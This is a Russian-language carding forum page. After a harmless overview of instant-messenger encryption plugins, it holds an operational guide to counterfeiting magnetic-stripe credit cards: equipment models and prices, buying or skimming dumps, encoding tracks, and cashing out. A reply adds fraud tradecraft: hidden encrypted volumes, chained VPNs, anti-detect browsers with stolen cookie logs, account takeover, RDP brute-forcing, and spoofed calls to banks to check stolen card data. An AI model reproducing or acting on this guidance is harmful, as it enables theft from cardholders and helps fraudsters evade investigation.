Поддерживается шифрование сообщений в сетях MSN Messenger, AIM, ICQ, Yahoo! и зашифрованная передача файлов в MSN Messenger и ICQ.

Для шифрования самих сообщений и файлов используются симметричные шифры AES, 3DES, CAST и Twofish c длиной ключа 128 бит.

Для безопасной передачи симметричного ключа шифруемой сессии и аутентификации собеседников используются ассимметричные шифры RSA 2048-4096 bit, ElGamal/DSA 1024/2048 bit, Elliptic curve over GF(p) 256/521 bit.

Программа работает с IM-клиентами в двух режимах:

1) Эмуляции IM-cервера - клиент отправляет сообщения на локальный сервер, там они шифруются и отправляются на настоящий сервер IM-cети. Если у Вас супер-пупер нестандартный клиент, то его возможности могут быть ограничены возможностями локального сервера. 2) Эмуляции прокси SOCKS4 - рекомендуемый режим. Клиент настраивается для работы через локальный SOCKS4 прокси на котором все и будет шифроваться.

Стандартные клиенты программа сама может настроить для работы через себя, а в альтернативных клиентах сервер надо будет прописать руками.

Сама программа так же поддерживает работу через SOCKS4/5/HTTP прокси, так что прямое подключение к интернету для нее не обязательно.

Естественно для того, чтобы шифрование работало необходимо, чтобы у всех участников беседы IM-клиенты работали через эту программу. Для нетребовательных домашних пользователей есть бесплатные Lite версии для каждого протокола. Для корпоративных пользователей и домашних с амбициями - версия Pro.

Настройка программы icq

1. сгенерируйте по 1 ключу каждого вида (длины)

2. пропишите в асе сокс 4 или 5 с IP 127.0.0.1 и портом 15190

3. запустите асю, если она загрузилась значит работает

Настройка программы jabber

1. сгенерируйте по 1 ключу каждого вида(длины)

2. пропишите в jabber сокс 4 или 5 с IP 127.0.0.1 и портом 15222

3. запустите жабу, если она загрузилась значит работает

Также для пользователей QIP имеется специальный плагин Xcrypt

Возможности:

- обмен ключами на основе ассимметричного алгоритма RSA с регулируемой длиной ключа

- шифрование симметричными алгоритмами в связке AES-Twofish-Serpent

- автоматическая расшифровка входящих сообщений, если зашифрованы и пароль сходится (поддержка оффлайн сообщений)

- генерация собственного формата хеша из пароля пользователя

- экспериментальным путем установлено, что отправить можно сообщение длиной примерно 1200 символов максимум, т.к. объем пересылаемого текста увеличивается в 2-3 раза

- возможность устанавливать различные пароли разным контактам

- не требуется никаких дополнительных программ

- простое и удобное включение/выключение шифрования

Как пользоваться:

- скачиваете Xcrypt

- устанавливаете (копируете в папку plugins rypt)

- запускаете qip, пользуетесь

Включение/выключение шифрования, а также установка пароля осуществляется кнопками под аватаром собеседника в окне чата.

Secure IM - плагин для для шифрование переписки Miranda

Плагин обладает ресурсными возможностями шифровать Ваши сообщения на AES192 или PGP/GPG.

Поддержите Unicode, tabSRMM и Clist

Для работы плагина требуется служба Crypto++

скачать сервис Crypto

скачать плагин SecureIM

RatCrypt - плагин для шифрование переписки RnQ

Шифрование переписки между 2-мя RnQ с установленными плагинами

- Алгоритн шифрования - AES 256bit

- Шифруется с помощью пароля или файла с ключом

скачать плагин RatCrypt

SecuredRQ - Плагин шифрования для &RQ

Описание:

Плагин предназначен для шифрования передаваемых сообщений по протоколу Oscar. Исходящие сообщения шифруются посредством алгоритма RSA, 128-битным ключем. Кодирование/декодирование производится при помощи публичных/приватных ключей.

Возможности:

— Шифрование сообщений 128-битным ключем посредством алгоритма RSA.

— Настройка шаблона шифрованых сообщений

— Всплывающие окна в области SysTray

— Смайл, отмечающий зашифрованные сообщения

Требования:

&RQ by Shyr не ниже версии 0.9.7.2.

Также проверена работа плагина на R&Q 1014 by Rapid.

Примечания:

Для работы SecuredRQ необходимо наличие плагина на обеих сторонах.

Плагин НЕ СОВМЕСТИМ с SecureIM.

скачать плагин SecuredRQ

OTR - плагин для шифрование переписки Pidgin

Off-The-Record (OTR) сообщениями позволяет проводить частные разговоры по мгновенными сообщениями, обеспечивая:

- шифрование (никто не сможет прочесть сообщения),

- аутентификацию (возможность удостовериться, что собеседник – тот, за кого он себя выдает),

- анонимность (после того, как разговор окончен, полученные сообщения нельзя однозначно связать с личностями собеседников),

- сохранность прежних сообщений (если ваш закрытый ключ оказался в чужих руках, можно не беспокоиться за сохранность сообщений).

Установив Pidgin, вы сохраняете и список контактов (если он у вас уже есть), и способность связываться с другими пользователями; важно лишь, чтобы все вы обменивались информацией по одному протоколу (например, ICQ).

Сначала нужно установить Pidgin, затем ОТР http://poplinux.ru/node/76

Статья для Параноиков))) всем спасибо!

P.S. Любой софт который не получается скачать... можно нагуглить и скачать!

Чем живут реальные кардеры?

Оружие, выстрелы, кровь - все это еще в недалеком прошлом являлось непременным атрибутом ограблений банков и инкассаторов. С появлением кредитных карт и развитием кардинга все изменилось. Теперь не нужно врываться в банк с автоматом в руках и требовать наличные. Достаточно получить доступ к банковскому аккаунту кардхолдера и вывести его деньги со счета. Сделать это можно несколькими способами, одним из которых являются поддельные кредитки, или «белый пластик».

Стандартизация пластиковых карт

Начинать работать, не имея понятия о том, что собой представляют пластиковые карты, невозможно. Поэтому - обо всем по порядку. Ты, наверное, знаешь, что карточки бывают разные (с магнитной полосой, чиповые, БСК, и т.д.). В общем виде их можно классифицировать по методам записи и обработки данных:
  • карты с магнитной полосой (магнитные карты);
  • карты со встроенной микросхемой (контактные и бесконтактные чиповые карты);
  • карты со штриховым кодом (штрихкодовые карты);
  • эмбоссированные/печатные карты (с нанесенной информацией методом тиснения или термопечати).
Реального кардера обычно интересуют магнитные и чиповые карты, так как именно они используются платежными системами. Размер карточек носит название ID-1 и составляет 85,6х53,98х0,76 мм. Лицевая сторона карты - аверс, на ней могут располагаться чип, информация о банке-эмитенте, номер карты и логотип платежной системы. На обратной стороне – реверсе - обычно находится магнитная полоса и полоса для подписи. Зоны тиснения информации также закреплены стандартами. Например, строка с идентификационным номером располагается на уровне 20 мм от нижнего края карты и не может превышать 19 символов. Под ней находится зона для нанесения данных кардхолдера (владельца карточки) и Expire Date (срока окончания действия карты). Кроме тиснения, применяется термопечать - печать на карте методом термодиффузии (при нанесении логотипов). Информацию, зафиксированную таким образом, практически невозможно стереть.

Коротко о чиповых картах

Было бы несправедливо не упомянуть в статье о чиповых картах, так как они широко используются российскими банками. Такие карты делятся на 2 типа:

контактные чиповые карты;

Бесконтактные чиповые карты.

Контактные карты содержат на аверсе (лицевой стороне) «карман» для расположения чипа. На сам чип-модуль наносится специальный клей, после чего микросхема вклеивается в «карман». Чип представляет собой микрокомпьютер, который обрабатывает поступающие команды (поэтому такие карты и называют смарт-картами). В нем реализована защищенная область памяти, информация в которой кодируется секретными ключами. Технология производства чипов постоянно совершенствуется. Что касается БСК (бесконтактных чиповых карт), то внутри по их периметру расположена антенна, которая позволяет картам обмениваться данными с картридером при помощи радиочастот. Сразу скажу, что в статье я не буду описывать способы подделки чиповых карт, так как основная мишень реал-кардинга - магнитные карты.

Тайна магнитной полосы

Надо отметить, что 90% международных платежных систем используют карты с магнитной полосой. На них я и остановлюсь подробнее. Магнитная полоса располагается на расстоянии 5,5 мм от верхнего края обратной стороны карты и может содержать 2-3 дорожки. Ширина полосы зависит от числа дорожек и составляет 6,4 мм при двух дорожках и 10,3 мм при трех. Как ты понял, вся информация, необходимая для совершения финансовых операций, находится на магнитной полосе.

Теперь рассмотрим каждую из трех дорожек. Первая дорожка включает буквенно-цифровую информацию. На ней помещается до 79 символов. Дорожка содержит следующие данные:
  • идентификационный номер - до 19 цифр;
  • код страны - 3 цифры;
  • ФИО кардхолдера (владельца карты) - от двух до 26 знаков;
  • Expire Date (дата истечения срока действия карты) - 4 цифры;
  • служебный код - 3 цифры;
  • информация эмитента - оставшиеся цифры.
На второй дорожке располагается только цифровая информация, кодируемая двоично-десятичным кодом. Всего на дорожке может быть до 39 символов. Вторая дорожка дублирует информацию первой, за исключением данных о кардхолдере.

Третья дорожка является необязательной. Она содержит цифровую информацию и кодируется аналогично первой дорожке. Максимальное число символов на дорожке - 107.

Ты спросишь: «Зачем нам все это нужно?» Ответ прост: реальный кардер может самостоятельно записывать данные на дорожки магнитной карты. Но об этом далее.

Кардинг, или делаем деньги

Как говорится, перейдем от теории к практике . Все действия реального кардера можно распределить в соответствии со следующим планом:
  • подделка пластиковой карты (нанесение тиснения, логотипов платежных систем - одним словом, придание куску пластика товарного вида =));
  • запись данных на магнитную полосу;
  • обналичивание/шопинг (то, для чего необходимы вышестоящие действия).
Начну с первого пункта. Здесь кардеру необходимо определиться с расходными материалами. Если он собирается налить деньги через банкоматы, то ему достаточно белого пластика с магнитной полоской, а если планирует заняться шопингом, то ему уже потребуется качественно сделанная кредитка с элементами термопечати и тиснения. Второй вариант я рассмотрю подробнее, так как, хотя он и связан с трудоемкий процессом изготовления, но на выходе предполагает полноценный, готовый к употреблению продукт =). Сразу скажу, что для открытия собственной «лаборатории» по производству картона (кредитных карт) преступнику нужны будут определенные денежные вложения, которые, впрочем, окупятся при умелом подходе.

Первая жизненно необходимая вещь - это пластик с впаянной магнитной полосой. Приобрести его сейчас не проблема. Наиболее распространенный тип пластика - CR-80.

Также для грязных дел необходим качественный принтер, с помощью которого на пластик будут наноситься печатный текст и эмблемы. Выбору принтера реальный кардер уделяет особое внимание, так как от него напрямую зависит внешний вид картонки. В качестве примера назову Eltron P210i, который используется для печати удостоверений, пропусков и т.д. Он подходит для односторонней печати без полей и почти идеально штампует карты с разрешением 300 dpi. Также Eltron P210i позволяет наносить штрихкоды, фотографии, графику и текст. Правда стоит он около $2000, но это не помеха, так как все затраты начинающего кардера, как было сказано выше, окупаемы.

Следующий шаг – «выдавливание» на карте инициалов кардхолдеров, банка-эмитента, номера карты и т.д. Для этого существует эмбоссер. Один из вариантов - Matica Z1, имеющий компактный размер и способный выпускать до 600 карт в сутки. Стоимость этого агрегата составляет порядка $3500. Для того чтобы окрасить эмбоссированные символы на карте, нужен типпер. Наиболее характерный выбор - Matica Z Tipper, который всего за несколько секунд придаст картонке подобающий вид. Цена подобного типпера колеблется в пределах $1600. Кроме эмбоссирования, типпинга и печати, на карту требуется нанести голограмму и полосу для подписи. Последняя, сделанная из особой бумаги, клеится на обратной стороне креды. На ней обязательно ставится подпись (по идее, владельца креды =)), без которой карта считается недействительной. Что касается голограммы, то тут дело обстоит несколько сложнее. Оригинальную голограмму практически невозможно содрать с поверхности кредитки. С большинства же поддельных картонок отклеить голограмму не составляет труда, поэтому кардеры уделяют пристальное внимание этой проблеме.

Так, о работе с пластиком я рассказал. Но от просто красиво окрашенных карт толку мало, поэтому перейдем ко второму этапу - записи данных на магнитную полосу. Для этого кардер приобретает энкодер - устройство для чтения и записи магнитной полосы карт. Энкодеры могут записывать 2 вида карт - high и low coercivity (высокой и низкой намагниченности). Лучше тот, который «понимает» любые карты.

Энкодеры также делятся на 2 типа в зависимости от количества записываемых дорожек (треков). Не старайся выбрать именно тот энкодер, который записывает все 3 дорожки, так как третий трек не используется ни POS-терминалами (за исключением редких случаев), ни банкоматами. Основную роль здесь играет вторая дорожка. С ее помощью можно вручную создать первый трек на основе данных, имеющихся во втором. Обычно используются именно эти две дорожки (первая и вторая). Третий трек, как правило, располагает на себе какую-либо дополнительную информацию, не имеющую принципиального значения (система скидок, бонусные очки владельца креды и т.д.).

Из популярных энкодеров могу отметить AMC C722 и MSR206. AMC C722 записывает и читает первые две дорожки; он прекрасно показал себя в «боевых» условиях. По цене он обойдется тебе в $800. После выбора и покупки энкодера преступнику необходимо раздобыть дампы, которые записываются на магнитные полосы картонок. Здесь есть 2 варианта:
  • кардер покупает дампы у селлеров (людей, торгующих дампами кред);
  • кардер самостоятельно добывает дампы.
С первым вариантом, думаю, ясно. Берется некая сумма вмз/еголд/etc, ищется человек/сервис по продаже дампов, и происходит закупка. А вот со вторым способом все намного интереснее. Здесь необходимо проявить смекалку и каким-то образом считать скимером (устройством для чтения данных с магнитной полосы) кредитку кардхолдера. Известны случаи сговора с официантами в кафе/ресторане (гостиничными менеджерами), которые за определенную плату считывали скимером дампы с кредитных карт посетителей и передавали их киберпреступнику. Но обычно кардеры закупаются у селлеров и не парятся по этому вопросу. Получив дампы, они подрубают к компу энкодер, ставят нужный софт (который иногда идет в комплекте с энкодером) и закатывают очередную картонку.

Собираем урожай

После всех описанных выше действий преступники приступают к третьему, самому ответственному пункту плана - обналичиванию или шопингу. Здесь есть свои нюансы. Если известен пин-код, то наиболее удобным способом является поход к банкомату. Но если человек закатывал на креду дамп, а пина (PIN) от карточки нет, то ситуация усложняется. Вариант с обналом в банкомате отпадает сразу, так как там ввод пин-кода является обязательным условием. Остается шопинг. Причем кардер ищет только те магазины, в которых установлены POS-терминалы, не требующие пина. Отличить их можно по отсутствию клавиатуры для набора пин-кода. Но, как показывает практика, в российских магазинах они встречаются нечасто. Правда до сих пор работает система с выездом за границу для последующего отоваривания в буржуйских шопах. Но для ее реализации нужны документы, билеты и отработанные схемы. Вообще говоря, такой шопинг является экстремальным в прямом смысле этого слова. Ведь неизвестно, что может ожидать человека в случае неудачной транзакции: удивление кассира, вызов милиции или полиции (за рубежом), звонок в банк и т.д. Как ни крути, но все варианты просчитать невозможно.
 
Last edited by a moderator:

Carder

Professional
Messages
2,619
Reputation
7
Reaction score
1,641
Points
113
Должен отметить, что для новичков наиболее полезным из комментариев может оказаться часть по настройке системы, остальное может показаться не очень оптимистичным, и дело не в том, что "все пропало", а в том, что я уже давно не начинал совсем с нуля, и все, с кем общаюсь, уже прошли стадию старта и суммы вложений в 1-5к$ стали обычным делом для теста направления. В то же время я абсолютно понимаю тех, кто хочет начать с вложений в 100-500$, а еще лучше и вовсе без них, научиться делать те же 500$-1000$ / мес, а дальше уже вкладываться с заработанных. Я очень рекомендую обращать внимание на тех, кто смог достигнуть такого результат совсем недавно, максимально стараться влиться к ним в команду и учиться, перенимать опыт.

Что касается меня, то на данный момент наиболее полезным я вижу взаимодействие с теми, кто уже прошел "путь новичка", научился делать 1-5к / месяц и хочет двигаться дальше.

И еще, в скором времени (сентябрь 19) будет ряд статей на основе 4х летнего опыта плотной работы по профильному направлению - бруту РДП, там будет еще больше актуальной информации )

А теперь к статье:

С подготовкой рабочей машины все верно, новый ССД, новая винда, никаких личных данных внутри.
С маком тоже можно работать, гуглите серию статей "мак на службе у хакера".

По выходу в интернет с модема - вопрос довольно спорный, т.к. крайне маловероятно что модемы вы будете менять его раз в пару недель, а если уж дойдет дело до обнаружения вашего источника выхода в интернет и вас нужно будет найти, то найдут, просто рядом с "левым" модемом будет регулярно светиться ваша реальная трубка. Более того, если вы не меняете его регулярно то в момент пробива устройство может быть все еще активно и тогда целесообразность его использования сводится на нет.
Но, не беспокойтесь, до этого дело не дойдет, если остальные пункты вы реализуете правильно.

Короче по интернету, пусть меня закидают тапками, но юзать свой обычный интернет на старте это НОРМ. НО ТОЛЬКО с проработкой всех следующих моментов.
Левел 100 это снимать квартиру по чужому паспорту и периодически ее менять, инет соответственно на владельца квартиры, а еще лучше соседский ВАЙ-ФАЙ.

Дальше нам потребуется создать криптоконтейнер с "двойным дном" при помощи ТРУКРИПТ или ВЕРАКРИПТ, информация легко гуглится.
В первую часть загружаем что-то типа порно, во вторую будем ставить виртуальную машину.
Работает это так, один пароль разблокирует одну часть, другой другую, причем установить что есть вторая часть невозможно. В критической ситуации показываем первую часть.

Во вторую часть загружаем виртуальную машину, по моему опыту ВиртуалБокс сильно удобнее ВМвари.
Оптимальное решение по ОС - Виндовс7 ультимейт.

Вернемся к выходу в интернет, нам нужно купить 2 ВПНа:
Первый - паблик на нашу основную машину, заходим в Гугл и выбираем любой, нормальная цена в пределах 100 баксов за год, всякие дабл - трипл - квадро нам не нужны. Рекомендовать конкретное что-то не буду, но предостерегу от КиберЧост - один из худших вариантов.

Второй - какой-то небольшой ВПН сервис от частного селера, на форуме есть предложения, либо поднять свой личный ВПН.
Цена вопроса тоже порядка 100$ в год. Его мы будем ставить на нашу виртуальную машину, соответсвенно перед работой включаем сперва первый, после заходим на виртуалку и включаем второй. Разумеется за второй ВПН оплачивать только криптой, либо с левых карт, за первый желательно так же.

Для еще большего отдаления от себя есть хороший вариант: арендовать VPS сервер, стоимость от 10 до 70 усд в месяц, на него заходить с виртуалки после 2х ВПН и установить софт по очистке логов подключения.
Но это уже для продвинутых, для старта 2 ВПН + виртуалка в криптоконтейнере оптимальный вариант.

Для ввода денег можно купить комплект КИВИ или ЯД с нужными лимитами и через обменники перевести в крипту. Начальные профиты можно выводить тем же способом в обратную сторону, для вывода комплект нужен с картой.

Есть и более замороченные варианты по безопасности и нюансы по вводу и выводу денег, для партнеров целый мануал расписал, и все же для старта этого будет достаточно, а для вывода сперва нужно что-то заработать )

Про слова и терминологию все так же, если не понимаете слово, не продолжайте чтение пока не разберетесь с его значением, это очень важно.

Во первых, все стало прилично дороже, ХТА закрыт, есть сложности найти нужный материал по адекватным ценам.
Во вторых, антифроды не стоят на месте и тупые вбивы с виртуалки на найденной в паблике проксе или тунельке скорее всего не принесут желанный результат.

Есть и хорошие новости, появились инструменты антидетектов, такие как сфера, появились сервисы предоставляющие хорошие индивидуальные прокси, логи под сферу с куками и другие полезности.
Альтернатива мобильное устройство + роутер, подключенный к нужным прокси.
Минус все тот же, вложения и время для осваивания инструментов.

В общем возможности развития в этом направлении я вижу только в дотошном изучении и использовании передовых решений.
Сумму для нормального вливания в тему с подсчетом затрат аналогично старой статье я вижу от 1.5к до 2.5к, разумно найти пару-тройку единомышленников и покупать/тестировать инструменты совместно.

Еще, по личному опыту могу сказать что грамотные вбивалы со своими софтами и знаниями как этим пользоваться в большом почете. Логов бывает много, сам всего не обработаешь, а адекватных вбивал найти очень не просто. Под словом адекватный я подразумеваю:
1) Высокий / стабильный онлайн
2) Выполнение обязательств, если уж сказал что за сегодня сделаешь 100 логов, значит сел и сделал, занес отчет в гугл докс, рассказы про лето и проебы никому не уперлись.
3) Знание функционала программ, той же сферой научиться пользоваться от и до можно за пару - тройку дней, но почему-то мало кто это считает нужным.
4) Желание учиться, делать больше чем нужно. Ну например если вам дали логи под ПайПал, вы их отработали, а после среди тех же логов отковыряли Амазон и обработали его не как бонус себе лично, а на общий баланс, то и логично что самые жирные логи лучше отдавать вам, а не тем кто делает минимум.

Короче говоря, для новичков нормальная тема освоить софт и написать так скажем "резюме" для поиска команды в которую можно влиться.
Так можно начать почти без финансовых вложений и хорошо поднимать на % с профита.

Тот же комментарий, что и в прошлом варианте, только ликвидные гифты это как правило мощные шопы, начинать с них вопрос спорный, опять же только использовать лучшие и нестандартные инструменты.

Далек от ПП, но суть та же самая, на смену бруту пришли логи, хорошие логи + инструменты дадут результат. Топорный перебор брут аккаунтов устарел.

По бруту РДП/ВНЦ/ССХ поговорим отдельно в след. статьях, с этим направлением преимущественно и работаем уже 4года.

Про СС мало чего добавлю, по ботам и фейкам действительно сложно для старта.
Сам редко работаю с СС.
Тем не менее из различных источников регулярно слышу что после закрытия ХТА с материалом просто жопа, валид низкий, выбора мало, прайс выше.
Это хорошая информация для тех, кто готов взять на себя роль фильтра.
Действительно есть люди, готовые платить хорошие $$$ за качественно отфильтрованный мат (например звонком в банк с подменой номера на номер холдера для уточнения баланса, валида, корректности данных).
По сути нужно найти как можно больше мест для покупки материала, найти банки, мат которых можно проверять звонком, протестировать и открыть сервис по продаже качественного материала на заказ. Большинство опытных стаферов с радостью оставят заказ по нужным данным и на след день выкупят материал подходящий под параметры.

В старой статье под логами понимался брут, правильнее было бы в той статье назвать "Аки с Брута"
По поводу добывать: софт все еще есть, базы так же продаются.
 

    Lord777

    Points: 1
    Это просто замечательная методичка! Лучшее что я когда-либо читал! Она обязательно поможет и пригодиться новичкам для успешной работы!
Top